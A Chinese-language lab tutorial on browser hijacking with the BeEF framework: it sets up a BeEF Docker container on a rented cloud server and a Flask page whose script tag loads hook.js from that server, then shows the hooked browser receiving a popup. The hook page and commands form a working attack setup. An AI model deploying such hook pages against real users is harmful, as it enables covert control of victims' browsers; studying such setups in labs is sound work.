beef-xss浏览器劫持
- 一,实验拓扑图
- 二,租用一台阿里云,搭建docker环境和beef环境
- 1.租一台阿里云服务器,系统选用ubuntu,计时收费的那种,一个小时几毛钱
- 2.开启策略组3000端口,5000端口
- 4.安装docker
- 5.拉取beef镜像,并且运行容器
- 6.运行beef容器:
- 三,使用python启动一个http web服务
- 1.beef.py 和templates 文件夹在同一级,beef.html在templates 文件夹下
- 2.安装 flask库并运行 beef.py:
- 3.本地打开浏览器访问页面 http://8.218.50.45:5000/beef,
- 4.观察beef控制台
- 四,对上线的受害主机浏览器进行劫持
- 1.执行创建对话框
- 2.本地浏览器出现弹窗
- 五,免责声明
一,实验拓扑图
二,租用一台阿里云,搭建docker环境和beef环境
1.租一台阿里云服务器,系统选用ubuntu,计时收费的那种,一个小时几毛钱
2.开启策略组3000端口,5000端口
4.安装docker
apt install docker.io
5.拉取beef镜像,并且运行容器
docker pull janes/beef
6.运行beef容器:
docker run -dp 3000:3000 janes/beef
打开浏览器 输入网址: http://8.218.50.45:3000/ui/panel 进入 beef控制台,用户名和密码都是 beef
三,使用python启动一个http web服务
1.beef.py 和templates 文件夹在同一级,beef.html在templates 文件夹下
beef.py
import os
from flask import Flask, request, render_template, redirect
app = Flask(__name__)
@app.route('/beef', methods=['POST', 'GET'])
def do_beef():
return render_template('beef.html')
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
beef.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<script src="http://8.218.50.45:3000/hook.js"></script>
<title>test</title>
</head>
<body>
please wait ...
</body>
</html>
其中<script src="http://8.218.50.45:3000/hook.js"></script> 是指向我们刚才搭建的beef平台
传到我们刚才租的那台阿里云服务器上如下:
2.安装 flask库并运行 beef.py:
pip3 install flask
python3 beef.py
3.本地打开浏览器访问页面 http://8.218.50.45:5000/beef,
4.观察beef控制台
四,对上线的受害主机浏览器进行劫持
1.执行创建对话框
2.本地浏览器出现弹窗
五,免责声明
本教程只能用于技术学习,不得使用本教程从事任何违法犯罪行为。
